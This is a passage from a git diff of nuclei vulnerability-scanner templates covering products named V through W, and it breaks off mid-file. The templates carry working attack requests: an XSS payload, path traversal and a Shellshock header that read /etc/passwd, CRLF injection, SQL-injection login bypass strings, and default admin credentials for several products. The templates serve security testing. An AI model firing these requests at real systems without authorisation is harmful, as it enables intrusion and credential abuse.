490a00463044022064c4ab13768f1a4fa885670b9020a4c8ac4cc28f650d65e7b146c52d1ccbd6fe02201650ae50cfbcbbf6790afdd7de6a939cb12ca3348c31167ade8a032969493f04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/vanguard-post-xss-10994.yaml b/nuclei-templates/Other/vanguard-post-xss-10994.yaml deleted file mode 100644 index c788fa2b9f..0000000000 --- a/nuclei-templates/Other/vanguard-post-xss-10994.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: vanguard-post-xss - -info: - name: Vanguard Marketplace CMS ≤ 2.1 - author: ImNightmaree - severity: medium - description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box - reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html - tags: vanguard,xss - -requests: - - raw: - - | - POST /search HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/vanguard-post-xss.yaml b/nuclei-templates/Other/vanguard-post-xss.yaml new file mode 100644 index 0000000000..aec8293448 --- /dev/null +++ b/nuclei-templates/Other/vanguard-post-xss.yaml @@ -0,0 +1,35 @@ +id: vanguard-post-xss + +info: + name: Vanguard Marketplace CMS ≤ 2.1 + author: ImNightmaree + severity: medium + description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box + reference: + - https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html + tags: vanguard,xss + +requests: + - raw: + - | + POST /search HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/vend-takeover-10997.yaml b/nuclei-templates/Other/vend-takeover-10998.yaml similarity index 100% rename from nuclei-templates/Other/vend-takeover-10997.yaml rename to nuclei-templates/Other/vend-takeover-10998.yaml diff --git a/nuclei-templates/Other/versa-default-login-11003.yaml b/nuclei-templates/Other/versa-default-login-11003.yaml new file mode 100644 index 0000000000..1dd0c3bf52 --- /dev/null +++ b/nuclei-templates/Other/versa-default-login-11003.yaml @@ -0,0 +1,46 @@ +id: versa-default-login + +info: + name: Versa Networks SD-WAN Application Default Login + author: davidmckennirey + severity: high + description: Searches for default admin credentials for the Versa Networks SD-WAN application. + tags: default-login,versa,sdwan + +requests: + - raw: + - | + GET /versa/login.html HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + POST /versa/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}}&sso=systemRadio + + attack: pitchfork + payloads: + user: + - Administrator + pass: + - versa123 + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_2 == 302' + - "contains(tolower(all_headers_2), 'jsessionid')" + - "contains(tolower(all_headers_2), 'location: /versa/index.html')" + condition: and + + - type: dsl + dsl: + - "contains(tolower(all_headers_2), '/login?error=true')" + - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" + negative: true \ No newline at end of file diff --git a/nuclei-templates/Other/versa-default-login.yaml b/nuclei-templates/Other/versa-default-login.yaml deleted file mode 100644 index 48d4d86354..0000000000 --- a/nuclei-templates/Other/versa-default-login.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: versa-default-login -info: - name: Versa Networks SD-WAN Application Default Login - author: davidmckennirey - severity: high - description: Versa Networks SD-WAN application default admin credentials were discovered. - reference: - - https://versa-networks.com/products/sd-wan.php - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: default-login,versa,sdwan -requests: - - raw: - - | - GET /versa/login.html HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - - | - POST /versa/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{user}}&password={{pass}}&sso=systemRadio - attack: pitchfork - payloads: - user: - - Administrator - pass: - - versa123 - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'status_code_2 == 302' - - "contains(tolower(all_headers_2), 'jsessionid')" - - "contains(tolower(all_headers_2), 'location: /versa/index.html')" - condition: and - - type: dsl - dsl: - - "contains(tolower(all_headers_2), '/login?error=true')" - - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" - negative: true - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/Other/video-synchro-pdf-lfi-11007.yaml b/nuclei-templates/Other/video-synchro-pdf-lfi-11007.yaml new file mode 100644 index 0000000000..4e25b1b4b0 --- /dev/null +++ b/nuclei-templates/Other/video-synchro-pdf-lfi-11007.yaml @@ -0,0 +1,25 @@ +id: video-synchro-pdf-lfi + +info: + name: Videos sync PDF 1.7.4 - Unauthenticated Local File Inclusion + author: Hassan Khan Yusufzai - Splint3r7 + severity: high + reference: + - https://www.exploit-db.com/exploits/50844 + - https://wordpress.org/plugins/video-synchro-pdf/ + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/video-synchro-pdf-lfi.yaml b/nuclei-templates/Other/video-synchro-pdf-lfi.yaml deleted file mode 100644 index 128ed998ca..0000000000 --- a/nuclei-templates/Other/video-synchro-pdf-lfi.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: video-synchro-pdf-lfi -info: - name: Videos sync PDF 1.7.4 - Unauthenticated Local File Inclusion - author: Hassan Khan Yusufzai - Splint3r7 - severity: high - reference: - - https://www.exploit-db.com/exploits/50844 - - https://wordpress.org/plugins/video-synchro-pdf/ - tags: wordpress,wp-plugin,lfi,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00' - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/vidyo-default-login-11009.yaml b/nuclei-templates/Other/vidyo-default-login-11009.yaml index ed1cdb3074..a9eb24bbcc 100644 --- a/nuclei-templates/Other/vidyo-default-login-11009.yaml +++ b/nuclei-templates/Other/vidyo-default-login-11009.yaml @@ -1,22 +1,21 @@ id: vidyo-default-login + info: name: Vidyo Default Login author: izn0u severity: medium - description: Vidyo default credentials were discovered. - reference: - - https://support.vidyocloud.com/hc/en-us/articles/226265128 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 + description: test for default cred super:password + reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 tags: vidyo,default-login + + requests: - raw: - | GET /super/login.html?lang=en HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} + - | POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} @@ -26,12 +25,14 @@ requests: Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en username={{username}}&password={{password}} + payloads: username: - super password: - password attack: pitchfork + extractors: - type: regex name: csrf_tkn @@ -40,20 +41,21 @@ requests: internal: true regex: - 'csrf_tkn=([A-Za-z0-9.-]+)' + - type: kval name: session internal: true part: header kval: - JSESSIONID + matchers-condition: and matchers: - type: word part: header words: - "/super/index.html" + - type: status status: - - 302 - -# Enhanced by mp on 2022/03/11 + - 302 \ No newline at end of file diff --git a/nuclei-templates/Other/viewlinc-crlf-injection-11011.yaml b/nuclei-templates/Other/viewlinc-crlf-injection-11011.yaml new file mode 100644 index 0000000000..8f68f3a04d --- /dev/null +++ b/nuclei-templates/Other/viewlinc-crlf-injection-11011.yaml @@ -0,0 +1,25 @@ +id: viewlinc-crlf-injection +info: + name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. + author: geeknik + severity: low + reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system + tags: crlf,viewlinc +requests: + - method: GET + path: + - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" + matchers-condition: or + matchers: + - type: word + words: + - "Server: viewLinc/5.1.2.367" + - "Set-Cookie: crlfinjection=crlfinjection" + part: header + condition: and + - type: word + words: + - "Server: viewLinc/5.1.1.50" + - "Set-Cookie: crlfinjection=crlfinjection" + part: header + condition: and diff --git a/nuclei-templates/Other/viewlinc-crlf-injection-11014.yaml b/nuclei-templates/Other/viewlinc-crlf-injection-11014.yaml deleted file mode 100644 index 97e0d4e5db..0000000000 --- a/nuclei-templates/Other/viewlinc-crlf-injection-11014.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: viewlinc-crlf-injection -info: - name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack - author: geeknik - severity: low - description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned. - reference: - - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system - tags: crlf,viewlinc -requests: - - method: GET - path: - - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" - matchers-condition: or - matchers: - - type: word - words: - - "Server: viewLinc/5.1.2.367" - - "Set-Cookie: crlfinjection=crlfinjection" - part: header - condition: and - - type: word - words: - - "Server: viewLinc/5.1.1.50" - - "Set-Cookie: crlfinjection=crlfinjection" - part: header - condition: and - -# Enhanced by mp on 2022/08/04 diff --git a/nuclei-templates/Other/viewpoint-system-status.yaml b/nuclei-templates/Other/viewpoint-system-status-11016.yaml similarity index 100% rename from nuclei-templates/Other/viewpoint-system-status.yaml rename to nuclei-templates/Other/viewpoint-system-status-11016.yaml diff --git a/nuclei-templates/Other/vigor-login-11020.yaml b/nuclei-templates/Other/vigor-login-11020.yaml new file mode 100644 index 0000000000..03be72a99c --- /dev/null +++ b/nuclei-templates/Other/vigor-login-11020.yaml @@ -0,0 +1,20 @@ +id: vigor-login +info: + name: Vigor Login Page + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/6610 + tags: panel,login +requests: + - method: GET + path: + - '{{BaseURL}}/weblogin.htm' + matchers-condition: and + matchers: + - type: word + words: + - 'Vigor Login Page' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/vigor-login-11023.yaml b/nuclei-templates/Other/vigor-login-11023.yaml deleted file mode 100644 index 8ed01c040b..0000000000 --- a/nuclei-templates/Other/vigor-login-11023.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: vigor-login -info: - name: Vigor Login Page - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6610 - tags: panel,login -requests: - - method: GET - path: - - '{{BaseURL}}/weblogin.htm' - matchers-condition: and - matchers: - - type: word - words: - - 'Vigor Login Page' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/virtual-ema-detect-11025.yaml b/nuclei-templates/Other/virtual-ema-detect-11025.yaml index d2d879c70b..69f0d6a9de 100644 --- a/nuclei-templates/Other/virtual-ema-detect-11025.yaml +++ b/nuclei-templates/Other/virtual-ema-detect-11025.yaml @@ -1,14 +1,17 @@ id: virtual-ema-detect + info: name: Virtual EMS Panel Detection author: iamthefrogy severity: info - tags: panel + tags: panel,ems + requests: - method: GET path: - "{{BaseURL}}/virtualems/Login.aspx" - "{{BaseURL}}/VirtualEms/Login.aspx" + matchers: - type: word words: diff --git a/nuclei-templates/Other/visionhub-default-login-11026.yaml b/nuclei-templates/Other/visionhub-default-login-11026.yaml deleted file mode 100644 index 33f448b3bb..0000000000 --- a/nuclei-templates/Other/visionhub-default-login-11026.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: visionhub-default-login -info: - name: VisionHub Default Login - author: Techryptic (@Tech) - severity: high - description: VisionHub application default admin credentials were accepted. - reference: - - https://www.qognify.com/products/visionhub/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: visionhub,default-login -requests: - - raw: - - | - POST /VisionHubWebApi/api/Login HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - "Set-Cookie: admin" - part: header - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/Other/visionhub-default-login-11029.yaml b/nuclei-templates/Other/visionhub-default-login-11029.yaml new file mode 100644 index 0000000000..0c32ed33aa --- /dev/null +++ b/nuclei-templates/Other/visionhub-default-login-11029.yaml @@ -0,0 +1,37 @@ +id: visionhub-default-login +info: + name: VisionHub Default Login + author: Techryptic (@Tech) + severity: high + description: VisionHub application default admin credentials were discovered. + tags: visionhub,default-login + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /VisionHubWebApi/api/Login HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: admin" + part: header + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/13 diff --git a/nuclei-templates/Other/visual-tools-dvr-rce-11032.yaml b/nuclei-templates/Other/visual-tools-dvr-rce-11032.yaml deleted file mode 100644 index 41d9f17306..0000000000 --- a/nuclei-templates/Other/visual-tools-dvr-rce-11032.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: visual-tools-dvr-rce - -info: - name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) - author: gy741 - severity: critical - description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://www.exploit-db.com/exploits/50098 - tags: visualtools,rce,oast,injection - -requests: - - raw: - - | - GET /cgi-bin/slogin/login.py HTTP/1.1 - Host: {{Hostname}} - Accept: */* - User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/visual-tools-dvr-rce.yaml b/nuclei-templates/Other/visual-tools-dvr-rce.yaml new file mode 100644 index 0000000000..74c22b7248 --- /dev/null +++ b/nuclei-templates/Other/visual-tools-dvr-rce.yaml @@ -0,0 +1,26 @@ +id: visual-tools-dvr-rce +info: + name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) + author: gy741 + severity: critical + description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + reference: + - https://www.exploit-db.com/exploits/50098 + tags: visualtools,rce,oast,injection +requests: + - raw: + - | + GET /cgi-bin/slogin/login.py HTTP/1.1 + Host: {{Hostname}} + Accept: */* + User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/31 diff --git a/nuclei-templates/Other/vmware-vcenter-lfi-linux-11042.yaml b/nuclei-templates/Other/vmware-vcenter-lfi-linux-11042.yaml deleted file mode 100644 index a6ab46dae7..0000000000 --- a/nuclei-templates/Other/vmware-vcenter-lfi-linux-11042.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: vmware-vcenter-lfi-linux - -info: - name: Vmware Vcenter LFI for Linux appliances - author: PR3R00T - severity: high - tags: vmware,lfi,vcenter - -requests: - - method: GET - path: - - "{{BaseURL}}/eam/vib?id=/etc/issue" - matchers: - - type: word - words: - - "vCenter Server" diff --git a/nuclei-templates/Other/vmware-vcenter-lfi-linux-11044.yaml b/nuclei-templates/Other/vmware-vcenter-lfi-linux-11044.yaml new file mode 100644 index 0000000000..ee5ee02d47 --- /dev/null +++ b/nuclei-templates/Other/vmware-vcenter-lfi-linux-11044.yaml @@ -0,0 +1,14 @@ +id: vmware-vcenter-lfi-linux +info: + name: Vmware Vcenter LFI for Linux appliances + author: PR3R00T + severity: high + tags: vmware,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/eam/vib?id=/etc/issue" + matchers: + - type: word + words: + - "vCenter Server" diff --git a/nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce.yaml b/nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce-11049.yaml similarity index 100% rename from nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce.yaml rename to nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce-11049.yaml diff --git a/nuclei-templates/Other/vmware-version-detect-11054.yaml b/nuclei-templates/Other/vmware-version-detect-11054.yaml deleted file mode 100644 index 64ecd7d1ad..0000000000 --- a/nuclei-templates/Other/vmware-version-detect-11054.yaml +++ /dev/null @@ -1,63 +0,0 @@ -id: vmware-version-detect - -info: - name: vmware-version-detect - author: elouhi - severity: info - description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information - reference: - - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ - - https://svn.nmap.org/nmap/scripts/vmware-version.nse - tags: tech,vcenter,vmware - -requests: - - raw: - - | - POST /sdk/ HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close - - - - - 00000001-00000001 - - - - <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance - - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - 'ha-folder-root' - - 'RetrieveServiceContentResponse' - - - type: word - words: - - "text/xml" - part: header - - extractors: - - type: regex - part: body - group: 1 - regex: - - "(.*?)" - - "(.*?)" - - "(.*?)" - - "(.*?)" - - "(.*?)" - - "(.*?)" diff --git a/nuclei-templates/Other/vmware-version-detect.yaml b/nuclei-templates/Other/vmware-version-detect.yaml new file mode 100644 index 0000000000..09a3e44bb9 --- /dev/null +++ b/nuclei-templates/Other/vmware-version-detect.yaml @@ -0,0 +1,57 @@ +id: vmware-version-detect +info: + name: vmware-version-detect + author: elouhi + severity: info + description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information + reference: + - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ + - https://svn.nmap.org/nmap/scripts/vmware-version.nse + tags: tech,vcenter,vmware +requests: + - raw: + - | + POST /sdk/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + + + + + 00000001-00000001 + + + + <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - 'ha-folder-root' + - 'RetrieveServiceContentResponse' + - type: word + words: + - "text/xml" + part: header + extractors: + - type: regex + part: body + group: 1 + regex: + - "(.*?)" + - "(.*?)" + - "(.*?)" + - "(.*?)" + - "(.*?)" + - "(.*?)" diff --git a/nuclei-templates/Other/vmware-vrealize-detect-11058.yaml b/nuclei-templates/Other/vmware-vrealize-detect-11058.yaml new file mode 100644 index 0000000000..6ebf2832bf --- /dev/null +++ b/nuclei-templates/Other/vmware-vrealize-detect-11058.yaml @@ -0,0 +1,30 @@ +id: vmware-vrealize +info: + name: VMware vRealize + author: milo2012 + severity: info + description: Version of VMware vRealize Operations Manager + tags: vmware,vrealize +requests: + - method: GET + path: + - "{{BaseURL}}/ui/login.action" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - text/html + part: header + - type: word + words: + - 'vRealize Operations Manager' + part: body + extractors: + - type: regex + part: body + group: 1 + regex: + - "SessionProvider.js\\?version=([0-9.]+)" diff --git a/nuclei-templates/Other/vmware-vrealize.yaml b/nuclei-templates/Other/vmware-vrealize.yaml deleted file mode 100644 index 1abab92afb..0000000000 --- a/nuclei-templates/Other/vmware-vrealize.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: vmware-vrealize - -info: - name: VMware vRealize - author: milo2012 - severity: info - description: Version of VMware vRealize Operations Manager - tags: vmware,vrealize - -requests: - - method: GET - path: - - "{{BaseURL}}/ui/login.action" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - text/html - part: header - - - type: word - words: - - 'vRealize Operations Manager' - part: body - - extractors: - - type: regex - part: body - group: 1 - regex: - - "SessionProvider.js\\?version=([0-9.]+)" diff --git a/nuclei-templates/Other/vmware-workflow-11059.yaml b/nuclei-templates/Other/vmware-workflow.yaml similarity index 100% rename from nuclei-templates/Other/vmware-workflow-11059.yaml rename to nuclei-templates/Other/vmware-workflow.yaml diff --git a/nuclei-templates/Other/vnc-detect-11061.yaml b/nuclei-templates/Other/vnc-detect-11061.yaml new file mode 100644 index 0000000000..03b86dc1f2 --- /dev/null +++ b/nuclei-templates/Other/vnc-detect-11061.yaml @@ -0,0 +1,26 @@ +id: vnc-service-detection +info: + name: VNC Service Detection + author: pussycat0x + severity: info + description: A Virtual Network Computing (VNC) service was detected. + classification: + cwe-id: CWE-200 + tags: network,vnc,service +network: + - inputs: + - data: "\r\n" + host: + - "{{Host}}:5900" + - "{{Hostname}}" + matchers: + - type: word + words: + - "RFB" + extractors: + - type: regex + part: body + regex: + - "RFB ([0-9.]+)" + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/Other/vnc-detect.yaml b/nuclei-templates/Other/vnc-detect.yaml deleted file mode 100644 index 606df9a79b..0000000000 --- a/nuclei-templates/Other/vnc-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: vnc-service-detection -info: - name: VNC Service Detection - author: pussycat0x - severity: info - tags: network,vnc,service - description: VNC service detection -network: - - inputs: - - data: "\r\n" - host: - - "{{Host}}:5900" - - "{{Hostname}}" - matchers: - - type: word - words: - - "RFB" - extractors: - - type: regex - part: body - regex: - - "RFB ([0-9.]+)" diff --git a/nuclei-templates/Other/vpms-auth-bypass-11068.yaml b/nuclei-templates/Other/vpms-auth-bypass-11068.yaml new file mode 100644 index 0000000000..2403b2bb4b --- /dev/null +++ b/nuclei-templates/Other/vpms-auth-bypass-11068.yaml @@ -0,0 +1,31 @@ +id: vpms-auth-bypass +info: + name: Vehicle Parking Management System 1.0 - Authentication Bypass + author: dwisiswant0 + severity: high + description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. + reference: https://www.exploit-db.com/exploits/48877 + tags: auth-bypass +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login.php + Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 + + email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 + matchers-condition: and + matchers: + - type: word + words: + - "LAGOS PARKER" + - "Login Successfully" + - "location.href = 'index.php';" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/vpms-auth-bypass-11069.yaml b/nuclei-templates/Other/vpms-auth-bypass-11069.yaml deleted file mode 100644 index a59b7b3bd1..0000000000 --- a/nuclei-templates/Other/vpms-auth-bypass-11069.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: vpms-auth-bypass - -info: - name: Vehicle Parking Management System 1.0 - Authentication Bypass - author: dwisiswant0 - severity: high - description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. - reference: https://www.exploit-db.com/exploits/48877 - tags: auth-bypass -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/login.php - Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 - - email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 - - matchers-condition: and - matchers: - - type: word - words: - - "LAGOS PARKER" - - "Login Successfully" - - "location.href = 'index.php';" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/vrealize-operations-log4j-rce-11072.yaml b/nuclei-templates/Other/vrealize-operations-log4j-rce.yaml similarity index 100% rename from nuclei-templates/Other/vrealize-operations-log4j-rce-11072.yaml rename to nuclei-templates/Other/vrealize-operations-log4j-rce.yaml diff --git a/nuclei-templates/Other/vsftpd-detection-11074.yaml b/nuclei-templates/Other/vsftpd-detection-11074.yaml index 934be20cb9..f4ecde4fab 100644 --- a/nuclei-templates/Other/vsftpd-detection-11074.yaml +++ b/nuclei-templates/Other/vsftpd-detection-11074.yaml @@ -1,18 +1,10 @@ id: vsftpd-detection info: - name: VSFTPD 2.3.4 - Backdoor Command Execution + name: VSFTPD v2.3.4 Backdoor Command Execution author: pussycat0x severity: critical - description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. - reference: - - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: - cwe-id: CWE-78 - remediation: This backdoor was removed on July 3rd, 2011. - tags: network,vsftpd,ftp,backdoor + tags: network,vsftpd,ftp + reference: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ network: - inputs: - data: "USER anonymous\r\nPASS pussycat0x\r\n" @@ -23,5 +15,3 @@ network: - type: word words: - "vsFTPd 2.3.4" - -# Enhanced by mp on 2022/05/23 diff --git a/nuclei-templates/Other/w3c-total-cache-ssrf-11077.yaml b/nuclei-templates/Other/w3c-total-cache-ssrf-11077.yaml new file mode 100644 index 0000000000..e85cc156ae --- /dev/null +++ b/nuclei-templates/Other/w3c-total-cache-ssrf-11077.yaml @@ -0,0 +1,20 @@ +id: w3c-total-cache-ssrf +info: + name: Wordpress W3C Total Cache SSRF <= 0.9.4 + author: random_robbie + severity: medium + tags: wordpress,wp-plugin,cache,ssrf + description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. + reference: + - https://wpvulndb.com/vulnerabilities/8644 + - https://klikki.fi/adv/w3_total_cache.html + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css' + matchers: + - type: word + words: + - "NessusFileIncludeTest" + part: body diff --git a/nuclei-templates/Other/w3c-total-cache-ssrf-11081.yaml b/nuclei-templates/Other/w3c-total-cache-ssrf-11081.yaml deleted file mode 100644 index 5812231890..0000000000 --- a/nuclei-templates/Other/w3c-total-cache-ssrf-11081.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: w3c-total-cache-ssrf -info: - name: Wordpress W3C Total Cache SSRF <= 0.9.4 - author: random_robbie - severity: medium - description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. - reference: - - https://wpvulndb.com/vulnerabilities/8644 - - https://klikki.fi/adv/w3_total_cache.html - tags: wordpress,wp-plugin,cache,ssrf -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css' - matchers: - - type: word - words: - - "NessusFileIncludeTest" - part: body diff --git a/nuclei-templates/Other/wadl-api-11085.yaml b/nuclei-templates/Other/wadl-api-11085.yaml index 1e046a7ef3..35e018d786 100644 --- a/nuclei-templates/Other/wadl-api-11085.yaml +++ b/nuclei-templates/Other/wadl-api-11085.yaml @@ -1,10 +1,10 @@ id: wadl-api info: name: wadl file disclosure - author: 0xrudra,manuelbua + author: 0xrudra & manuelbua severity: info tags: 